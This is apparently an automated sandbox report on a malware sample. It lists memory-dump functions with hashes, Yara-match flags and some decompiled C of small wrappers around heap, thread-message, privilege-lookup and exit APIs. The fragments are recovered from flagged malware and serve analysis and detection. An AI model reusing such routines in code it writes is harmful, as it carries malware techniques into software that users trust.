                • Instruction Fuzzy Hash: D690026121180042D20065A94C18B170045A7D1383F51C215A5148664CC95589796561
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018D95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: f717b1f4ddf33716d1649c39d170dce374185fa878d2f90e85a5a3702d7ca560
                • Instruction ID: a26870dda83c28240fed10a6da1ad643e0199de0f08acfcde9f39b61c7925acb
                • Opcode Fuzzy Hash: f717b1f4ddf33716d1649c39d170dce374185fa878d2f90e85a5a3702d7ca560
                • Instruction Fuzzy Hash: 869002A120200003410571994418626404AA7E1381B51C121E60086A0DC56589A97165
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018D9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 660219a38aa86ade16f61d007dab1aca53e9c9ff204866a8fb78c7908ba94ead
                • Instruction ID: 25d3dc18543222bc226cfe4ad701c217de339c281b13f7a78db9e78f92bf21e0
                • Opcode Fuzzy Hash: 660219a38aa86ade16f61d007dab1aca53e9c9ff204866a8fb78c7908ba94ead
                • Instruction Fuzzy Hash: B9900265211000030105A59907085170086A7D63D1351C121F6009660CD66189796161
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018D9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 453a1027033e125f283cfeb07e69ddba1e67f54c418d8ef292fc6cbbfc337b9e
                • Instruction ID: 8bae8b49cea459c22722bfb571b02aa536d9146785cf1ec7446fd74d5bb2cfac
                • Opcode Fuzzy Hash: 453a1027033e125f283cfeb07e69ddba1e67f54c418d8ef292fc6cbbfc337b9e
                • Instruction Fuzzy Hash: 7290026921300002D1807199540C61A0045A7D2382F91D515A5009668CC955897D6361
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018D97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: fdcf314f693dcb38e55cb396c5575e6d359a34f9a33c80fb60338c83216b57dd
                • Instruction ID: be3ce218bbf776591d00267c21f068cd6729aac63d2bcb0d7a527258008e5d6e
                • Opcode Fuzzy Hash: fdcf314f693dcb38e55cb396c5575e6d359a34f9a33c80fb60338c83216b57dd
                • Instruction Fuzzy Hash: B690026130100003D1407199541C6164045F7E2381F51D111E5408664CD955896E6262
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018D9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 9aee380747773235e89c6532043fbc3d93feeae95382f8ee55d46e6bbdb0c276
                • Instruction ID: 728c84c82ce69c5de3b9ea38c88e8e582ab7cebf0184faaf8b87319b51376e91
                • Opcode Fuzzy Hash: 9aee380747773235e89c6532043fbc3d93feeae95382f8ee55d46e6bbdb0c276
                • Instruction Fuzzy Hash: 1290027131114402D110619984087160045A7D2381F51C511A5818668DC6D589A97162
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018D9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 4ce253358004d4310ea07fa1bae9ea9d14346622ede73bd6b1ddffb5c2e8785c
                • Instruction ID: 4fcf1ab5422ba200f23f3f4c5d2b7e2de0ea2edc15f0f70b43ab4f30021315b9
                • Opcode Fuzzy Hash: 4ce253358004d4310ea07fa1bae9ea9d14346622ede73bd6b1ddffb5c2e8785c
                • Instruction Fuzzy Hash: 2990027120100402D10065D9540C6560045A7E1381F51D111AA018665EC6A589A97171
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018D96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 1929ea10d68b3098ceac97e2ee4a910a317686497f7341ac464589112af8b7de
                • Instruction ID: 6e55cf9ecf6c0dd0d2ca79c131fd3c9bd80e851aee30bf829a01120951751849
                • Opcode Fuzzy Hash: 1929ea10d68b3098ceac97e2ee4a910a317686497f7341ac464589112af8b7de
                • Instruction Fuzzy Hash: 1590027120108802D1106199840875A0045A7D1381F55C511A9418768DC6D589A97161
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018D9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 46c5c95f18af89db95e2a59d7995a132af7dd3e6f74091e00fcf0bf3c168bbc5
                • Instruction ID: fe93457a4fcad1289ec6382bf934db5aea854220ef0c0c432154f865c6ada710
                • Opcode Fuzzy Hash: 46c5c95f18af89db95e2a59d7995a132af7dd3e6f74091e00fcf0bf3c168bbc5
                • Instruction Fuzzy Hash: D190027120100802D1807199440865A0045A7D2381F91C115A5019764DCA558B6D77E1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004088C0, Relevance: .1, Instructions: 92COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
                • Instruction ID: 45e1b5456bc83a9244d52dfc8b0508b5930111f9c3f75bdf3035c43f7544f730
                • Opcode Fuzzy Hash: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
                • Instruction Fuzzy Hash: C8212BB2D442085BCB11E6609D42BFF736C9B14304F04017FE989A2181FA38AB498BA7
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004188A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                0x004188b7
                0x004188c2
                0x004188cd
                0x004188d1

                APIs
                • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID: &5A
                • API String ID: 1279760036-1617645808
                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00407305, Relevance: 1.7, APIs: 1, Instructions: 198threadwindowCOMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E00407305(void* __eax, signed int __ebx, intOrPtr _a4, intOrPtr _a8, long _a12, int _a16, int _a20) {
				int _v4;
				intOrPtr _v8;
				char _v64;
				long _v128;
				int _v132;
				char _v652;
				long _v664;
				char _v684;
				intOrPtr _v688;
				intOrPtr __edi;
				int __esi;
				void* __ebp;
				void* _t66;
				int _t67;
				signed int _t71;
				long _t76;
				int _t80;
				void* _t82;

				_t71 = __ebx * 0xf0a6f635;
				_t88 = _t71;
				if(_t71 >= 0) {
					 *[cs:eax] =  *[cs:eax] + __eax + _t71;
					E0041AD10( &_v64, 3);
					_t66 = E00409B30(_t88, _a8 + 0x1c,  &_v64); // executed
					_t67 = E00413E40(_a8 + 0x1c, _t66, 0, 0, 0xc4e7b6d6);
					_t80 = _t67;
					if(_t80 != 0) {
						_t76 = _a12;
						_t67 = PostThreadMessageW(_t76, 0x111, 0, 0); // executed
						_t90 = _t67;
						if(_t67 == 0) {
							_t67 =  *_t80(_t76, 0x8003, _t82 + (E00409290(_t90, 1, 8) & 0x000000ff) - 0x40, _t67);
						}
					}
					return _t67;
				} else {
					if(__eflags == 0) {
						__eflags = __al - 0x55;
						_push(__ebp);
						__ebp = __esp;
						__esp = __esp - 0x2ac;
						_push(__ebx);
						_push(__esi);
						_push(__edi);
						__eax = 0;
						__eflags = 0;
						_v8 = 0;
						_v688 = 0;
						 &_v684 = E0041A130( &_v684, 0, 0x2a4);
						__esi = _a16;
						__ecx =  *((intOrPtr*)(__esi + 0x300));
						__edi = _a4;
						__eax = E00407280(__ecx, _a4, __ecx); // executed
						__eax = E004199C0(__ecx);
						_t15 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
						__ebx = __eax + _t15;
					}
					asm("adc [eax], al");
					__al = __al +  *__eax;
					_a20 = 0;
					while(1) {
						__eax = E0040D3C0(__edi, 0xfe363c80); // executed
						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
						__eax =  &_v684;
						__eax = E00418770(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v684, 0x2a8, 0); // executed
						 *(__esi + 0x2dc) = __eax;
						__eflags = __eax;
						if(__eax < 0) {
							break;
						}
						__eflags = _v652;
						if(_v652 == 0) {
							L15:
							__eax = _a20;
							__eax = _a20 + 1;
							_a20 = __eax;
							__eflags = __eax - 2;
							if(__eax < 2) {
								continue;
							} else {
								__ebx = _v4;
								goto L19;
							}
						} else {
							__eflags = _v664;
							if(_v664 == 0) {
								goto L15;
							} else {
								__eflags = _v132;
								if(_v132 == 0) {
									goto L15;
								} else {
									__eflags = _v128;
									if(_v128 != 0) {
										__eax = _a16;
										__edx =  &_v684;
										__ebx = 1;
										__eax = E0041A0B0(_a16,  &_v684, 0x2a8);
										L19:
										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
										__eax = E00418700(__edi,  *((intOrPtr*)(__esi + 0x2f4)));
										__eflags = __ebx;
										if(__ebx == 0) {
											break;
										} else {
											__edx = _v664;
											__eax = _a16;
											__ecx = _v132;
											 *(_a16 + 0x14) = _v664;
											__edx =  *(__esi + 0x2d0);
											_t35 = __esi + 0x2e8; // 0x2e8
											__eax = _t35;
											 *_t35 = _v132;
											__eax = _a16;
											_t37 = __esi + 0x314; // 0x314
											__ebx = _t37;
											__ecx = 0;
											__eax = _a16 + 0x220;
											 *__ebx = 0x18;
											 *((intOrPtr*)(__esi + 0x318)) = 0;
											 *((intOrPtr*)(__esi + 0x320)) = 0;
											 *((intOrPtr*)(__esi + 0x31c)) = 0;
											 *((intOrPtr*)(__esi + 0x324)) = 0;
											 *((intOrPtr*)(__esi + 0x328)) = 0;
											__eax = E00417F80(__edi, _a16 + 0x220,  *(__esi + 0x2d0), __ebx, _a16 + 0x220);
											__ecx = 0;
											 *(__esi + 0x2dc) = __eax;
											__eflags = __eax;
											if(__eax < 0) {
												break;
											} else {
												__edx = _v128;
												_t45 = __esi + 0x2e0; // 0x2e0
												__eax = _t45;
												 *((intOrPtr*)(__esi + 0x318)) = 0;
												 *((intOrPtr*)(__esi + 0x320)) = 0;
												 *((intOrPtr*)(__esi + 0x31c)) = 0;
												 *((intOrPtr*)(__esi + 0x324)) = 0;
												 *((intOrPtr*)(__esi + 0x328)) = 0;
												_a16 = _a16 + 0x224;
												 *(__esi + 0x2e4) = _v128;
												 *__ebx = 0x18;
												 *(__esi + 0x2d0) = 0x1a;
												__eax = E00417FC0(__edi, _a16 + 0x224, 0x1a, __ebx, _t45);
												 *(__esi + 0x2dc) = __eax;
												__eflags = __eax;
												if(__eax < 0) {
													break;
												} else {
													__edx = _a12;
													 *(__edx + 0x10) =  *(__edx + 0x10) + 0x200;
													__eflags =  *(__edx + 0x10) + 0x200;
													__eax = E00419660(__ecx);
													__ebx = __eax;
													__eax =  *(__ebx + 0x28);
													__eax = E0041A3A0( *(__ebx + 0x28));
													__edx =  *(__ebx + 0x28);
													_t60 = __eax + 2; // 0x2
													__ecx = __eax + _t60;
													__eax =  &_v652;
													__eax = E00413A40(__edi,  &_v652, 2, 0); // executed
													_pop(__edi);
													_pop(__esi);
													_pop(__ebx);
													__esp = __ebp;
													_pop(__ebp);
													return __eax;
												}
											}
										}
									} else {
										goto L15;
									}
								}
							}
						}
						goto L23;
					}
					_pop(__edi);
					_pop(__esi);
					__eax = 0;
					__eflags = 0;
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return 0;
				}
				L23:
			}





















                0x00407305
                0x00407305
                0x0040730b
                0x00407295
                0x0040729e
                0x004072ae
                0x004072be
                0x004072c3
                0x004072ca
                0x004072cd
                0x004072da
                0x004072dc
                0x004072de
                0x004072fb
                0x004072fb
                0x004072fd
                0x00407302
                0x0040730d
                0x0040730d
                0x0040730f
                0x00407310
                0x00407311
                0x00407313
                0x00407319
                0x0040731a
                0x0040731b
                0x0040731c
                0x0040731c
                0x00407324
                0x00407327
                0x00407334
                0x00407339
                0x0040733c
                0x00407342
                0x00407347
                0x0040734f
                0x0040735a
                0x0040735a
                0x0040735a
                0x0040735c
                0x0040735f
                0x00407361
                0x00407370
                0x00407376
                0x0040737b
                0x00407388
                0x00407392
                0x0040739a
                0x004073a0
                0x004073a2
                0x00000000
                0x00000000
                0x004073a4
                0x004073ac
                0x004073c6
                0x004073c6
                0x004073c9
                0x004073ca
                0x004073cd
                0x004073d0
                0x00000000
                0x004073d2
                0x004073d2
                0x00000000
                0x004073d2
                0x004073ae
                0x004073ae
                0x004073b5
                0x00000000
                0x004073b7
                0x004073b7
                0x004073be
                0x00000000
                0x004073c0
                0x004073c0
                0x004073c4
                0x004073e0
                0x004073e8
                0x004073f0
                0x004073f5
                0x004073fd
                0x004073fd
                0x00407405
                0x0040740d
                0x0040740f
                0x00000000
                0x00407411
                0x00407411
                0x00407417
                0x0040741a
                0x00407420
                0x00407423
                0x00407429
                0x00407429
                0x00407430
                0x00407432
                0x00407435
                0x00407435
                0x0040743c
                0x0040743f
                0x00407446
                0x0040744c
                0x00407452
                0x00407458
                0x0040745e
                0x00407464
                0x0040746a
                0x0040746f
                0x00407474
                0x0040747a
                0x0040747c
                0x00000000
                0x00407482
                0x00407482
                0x00407485
                0x00407485
                0x0040748c
                0x00407492
                0x00407498
                0x0040749e
                0x004074a4
                0x004074b0
                0x004074b8
                0x004074be
                0x004074c4
                0x004074ce
                0x004074d6
                0x004074dc
                0x004074de
                0x00000000
                0x004074e4
                0x004074e4
                0x004074ea
                0x004074ea
                0x004074f0
                0x004074fd
                0x004074ff
                0x00407503
                0x00407508
                0x0040750b
                0x0040750b
                0x0040751b
                0x00407523
                0x0040752b
                0x0040752c
                0x0040752d
                0x0040752e
                0x00407530
                0x00407531
                0x00407531
                0x004074de
                0x0040747c
                0x00000000
                0x00000000
                0x00000000
                0x004073c4
                0x004073be
                0x004073b5
                0x00000000
                0x004073ac
                0x004073d7
                0x004073d8
                0x004073d9
                0x004073d9
                0x004073db
                0x004073dc
                0x004073de
                0x004073df
                0x004073df
                0x00000000

                APIs
                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID:
                • API String ID: 1836367815-0
                • Opcode ID: ce300330146a8661e7410a329c44b7f78299cf6c0a400ce6e22a8cdd61fc44e6
                • Instruction ID: 8cf4fbbc09d6be6740cf1c0a9c8f6e5ec51e4ce6f5358c01997198c23fb72c64
                • Opcode Fuzzy Hash: ce300330146a8661e7410a329c44b7f78299cf6c0a400ce6e22a8cdd61fc44e6
                • Instruction Fuzzy Hash: 02619471900309AFDB25DF64DC86FEB77B8AB05304F10446EF949A7281D778AD41CBAA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004189E5, Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                Download Yara Rule
                APIs
                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: LookupPrivilegeValue
                • String ID:
                • API String ID: 3899507212-0
                • Opcode ID: 6e2e3cb4d51242afeca40aab31b1a5c4cda87ccc28f373da820936786e375428
                • Instruction ID: 3e08fda0d151c04d680ca7af3dfef04ea5fb34e5a70fe15e182c7e7206429ebc
                • Opcode Fuzzy Hash: 6e2e3cb4d51242afeca40aab31b1a5c4cda87ccc28f373da820936786e375428
                • Instruction Fuzzy Hash: D82138B5200208AFDB14DF99DC84EEB77ADAF88790F148259FA4C97241CA34E855CBB4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E00407280(void* __ecx, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				char* _t9;
				void* _t13;
				intOrPtr* _t14;
				int _t15;
				long _t23;
				intOrPtr* _t27;
				void* _t28;
				void* _t32;

				_push(0x3f);
				_t9 =  &_v67;
				_push(0);
				_push(_t9);
				_v68 = 0;
				 *[cs:eax] =  *[cs:eax] + _t9 + __ecx;
				E0041AD10( &_v68, 3);
				_t13 = E00409B30(_t32, _a4 + 0x1c,  &_v68); // executed
				_t14 = E00413E40(_a4 + 0x1c, _t13, 0, 0, 0xc4e7b6d6);
				_t27 = _t14;
				if(_t27 != 0) {
					_t23 = _a8;
					_t15 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
					_t34 = _t15;
					if(_t15 == 0) {
						_t15 =  *_t27(_t23, 0x8003, _t28 + (E00409290(_t34, 1, 8) & 0x000000ff) - 0x40, _t15);
					}
					return _t15;
				}
				return _t14;
			}













                0x00407287
                0x00407289
                0x0040728c
                0x0040728e
                0x0040728f
                0x00407295
                0x0040729e
                0x004072ae
                0x004072be
                0x004072c3
                0x004072ca
                0x004072cd
                0x004072da
                0x004072dc
                0x004072de
                0x004072fb
                0x004072fb
                0x00000000
                0x004072fd
                0x00407302

                APIs
                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID:
                • API String ID: 1836367815-0
                • Opcode ID: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                • Instruction ID: b237522831fa2f29c3a6f065e8e6a5a8a1bdd1e87b57dfaece1adfce5d1a8559
                • Opcode Fuzzy Hash: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                • Instruction Fuzzy Hash: DC018431A8022876E721AA959C03FFE776C5B00B55F15416EFF04BA1C2E6A8790546EA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004188D2, Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E004188D2(void* __esi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				intOrPtr _v117;
				char _t12;
				void* _t17;

				asm("lock xor ebp, esp");
				asm("o16 int 0x44");
				_v117 = ss;
				_t9 = _a4;
				_t5 = _t9 + 0xc74; // 0xc74
				E004191D0(_t17, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t12;
			}






                0x004188d2
                0x004188dc
                0x004188df
                0x004188e3
                0x004188ef
                0x004188f7
                0x0041890d
                0x00418911

                APIs
                • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 95abd86dea0b7fc6c31473d98f33caf3c532a550fd683503335ad1f2126a1b07
                • Instruction ID: 441eb347d5dbeac212da70b84747f9a6760145cc0d3c732275e06d3e4f1b9884
                • Opcode Fuzzy Hash: 95abd86dea0b7fc6c31473d98f33caf3c532a550fd683503335ad1f2126a1b07
                • Instruction Fuzzy Hash: 3EE06DB1600205BFDB18DF95CC4AEDBB7ACEF44750F114559FD089B251D631E914CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004188E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                0x004188ef
                0x004188f7
                0x0041890d
                0x00418911

                APIs
                • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00418A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                0x00418a5a
                0x00418a70
                0x00418a74

                APIs
                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: LookupPrivilegeValue
                • String ID:
                • API String ID: 3899507212-0
                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00418920, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                Download Yara Rule
                APIs
                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: ExitProcess
                • String ID:
                • API String ID: 621844428-0
                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00418924, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                Download Yara Rule
                APIs
                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: ExitProcess
                • String ID:
                • API String ID: 621844428-0
                • Opcode ID: 50419f7403b405ff8d11456def3b13ba85d096b127995936e86c59acd4bba7cf
                • Instruction ID: 664c109bfab8776e38b0126f392604523e1a590ebb6935f8dbce45a4b840e817
                • Opcode Fuzzy Hash: 50419f7403b405ff8d11456def3b13ba85d096b127995936e86c59acd4bba7cf
                • Instruction Fuzzy Hash: D7D0A9742082403BD7109B288CC9EC33BA88F45300F1889ADBCE82B203C034AA44C7A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018D967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 68b301fd94b954275722a09b62615f2322b6894302e13ce9c4a8807e9877d0eb
                • Instruction ID: 2204a83720acbdedcfd9b4a204bbad34eb0b970d47639a0b49348e1640651e68
                • Opcode Fuzzy Hash: 68b301fd94b954275722a09b62615f2322b6894302e13ce9c4a8807e9877d0eb
                • Instruction Fuzzy Hash: 1FB02B71D010C0C5D601D3B0060C7273A0077C0340F13C011D2024340B4338C194F2B1
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 0194B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                Download Yara Rule
                Strings
                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0194B476
                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0194B484
                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0194B3D6
                • The critical section is owned by thread %p., xrefs: 0194B3B9
                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0194B39B
                • Go determine why that thread has not released the critical section., xrefs: 0194B3C5
                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0194B2DC
                • The instruction at %p tried to %s , xrefs: 0194B4B6
                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0194B305
                • *** Resource timeout (%p) in %ws:%s, xrefs: 0194B352
                • *** enter .cxr %p for the context, xrefs: 0194B50D
                • The resource is owned shared by %d threads, xrefs: 0194B37E
                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0194B47D
                • *** then kb to get the faulting stack, xrefs: 0194B51C
                • The instruction at %p referenced memory at %p., xrefs: 0194B432
                • read from, xrefs: 0194B4AD, 0194B4B2
                • This failed because of error %Ix., xrefs: 0194B446
                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0194B2F3
                • an invalid address, %p, xrefs: 0194B4CF
                • <unknown>, xrefs: 0194B27E, 0194B2D1, 0194B350, 0194B399, 0194B417, 0194B48E
                • write to, xrefs: 0194B4A6
                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0194B314
                • *** enter .exr %p for the exception record, xrefs: 0194B4F1
                • a NULL pointer, xrefs: 0194B4E0
                • *** An Access Violation occurred in %ws:%s, xrefs: 0194B48F
